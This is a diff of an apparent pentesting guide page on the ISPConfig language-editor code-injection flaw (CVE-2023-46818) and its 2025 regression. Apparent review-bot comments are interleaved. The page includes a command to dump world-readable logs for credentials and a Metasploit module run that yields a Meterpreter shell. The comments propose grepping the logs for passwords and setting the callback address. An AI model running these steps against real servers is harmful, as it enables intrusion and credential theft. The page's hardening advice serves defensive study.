If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
76
76
77
+
### 2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
78
+
79
+
The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in **3.3.0p2**. Preconditions are unchanged (`admin_allow_langedit` and admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.
80
+
81
+
**Notes:**
82
+
- On 3.3.0/3.3.0p1, world-readable rotated logs under `/usr/local/ispconfig/interface/log/` may leak credentials if debug logging was enabled:
83
+
84
+
```bash
85
+
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
86
+
```
87
+
- Exploit steps match CVE-2023-46818; 3.3.0p2 adds extra checks before language editing.
88
+
77
89
### Python PoC
78
90
79
91
A ready-to-use exploit automates token handling and payload delivery:
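Review bot: the rotated-log check in this hunk (`find ... -exec zcat {} + | head`) only prints the first ten lines of the concatenated archives, so it will not surface credentials that sit further into the logs and does not actually test the claim that the logs "may leak credentials"; replace `| head` with a keyword search, e.g. `-exec zgrep -il 'password' {} +` or at least `| grep -i password`. The `-perm -004` test is correct for other-readable files. Separately, "3.3.0p2 adds extra checks before language editing" should say what the checks are or link the fix commit, since a reader has nothing to verify against.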
Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`, which can auto-enable `admin_allow_langedit` if the supplied admin account has system-config rights.
103
+
104
+
```text
105
+
use exploit/linux/http/ispconfig_lang_edit_php_code_injection
106
+
set RHOSTS 10.10.10.50
107
+
set RPORT 8080
108
+
set USERNAME admin
109
+
set PASSWORD <admin_pass>
110
+
set TARGETURI /
111
+
run
112
+
```
113
+
114
+
The module writes a base64-encoded payload through `records[]` and executes it, giving a PHP Meterpreter or custom payload.
115
+
88
116
### Hardening
89
117
90
-
- Upgrade to 3.2.11p1 or later
118
+
- Upgrade to **3.2.11p1** or later for the original issue, and to **3.3.0p2** or later for the 2025 regression.
91
119
- Disable the language editor unless strictly needed:
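Review bot: the msfconsole listing in this hunk never sets `LHOST` (or a `PAYLOAD`), so with a reverse PHP Meterpreter `run` will fail on the missing callback address; add `set LHOST <attacker_ip>` before `run`, or state that the defaults are assumed. The claim that the module can auto-enable `admin_allow_langedit` when the account has system-config rights needs a source (the module's PR or its documentation), since the rest of the page lists that setting as a hard precondition. Minor: this block is fenced as ```text while the file's other fence is ```bash; a console transcript as text is fine, but pick one convention.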